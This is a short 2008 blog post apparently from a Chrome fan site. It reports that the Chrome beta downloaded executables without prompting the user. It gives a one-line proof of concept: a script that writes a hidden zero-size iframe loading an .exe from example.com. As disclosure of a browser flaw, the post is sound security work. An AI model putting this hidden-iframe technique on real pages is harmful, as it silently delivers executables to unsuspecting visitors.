Google Chrome is vulnerable – Automatic File Download Exploit

« Running Google Chrome under WINE - Chrome expected on Google’s Android Platform »

Google Chrome is vulnerable – Automatic File Download Exploit

8 September 2008

Written by: admin Posted under Security

Google’s new Web browser (Chrome) allows files (e.g., executables) to be automatically downloaded to the user’s computer without any user prompt.
This was tested on Windows Vista SP1 and Windows XP SP3 with Google Chrome (BETA)

Here is the code that demonstrates this issue:
<script type="text/javascript">// <![CDATA[ document.write('<iframe src="http://www.example.com/hello.exe" frameborder="0" width="0" height="0">'); // ]]></script></code>



  





  Leave a reply

  
Name (mandatory)


Email (mandatory)


WWW







Site Search
        
	
		
		
	
	
Subscribe Now
 
Recent Entries

	
Chrome’s Keyboard Shortcuts
	Chrome Easter Eggs
	Chrome Hacks – “about:internets”
	New Chrome Themes Available For Download!
	Google Chrome Theme Switcher
			




 

   BlogRoll
        
      Cool Gadgets

Free Online Games

Michael Jackson Ringtones

Need For Speed Underground 2 Mobile Download

Online Kids Games

PSP Codes

YouTube Videos Download


        
   Archive
        	September 2008

	  



Categories 

  	Hacks

	News

	Plugins

	Security

	Themes



Meta


Log in









Copyright © Chrome Browser (Google Chrome) Blog

Powered by WordPress

Chrome Browser (Google Chrome) Blog

Themes, Plugins, Tips, Hacks for Google Chrome

Google Chrome is vulnerable – Automatic File Download Exploit

Leave a reply

Site Search

Subscribe Now

Recent Entries

BlogRoll

Archive

Categories

Meta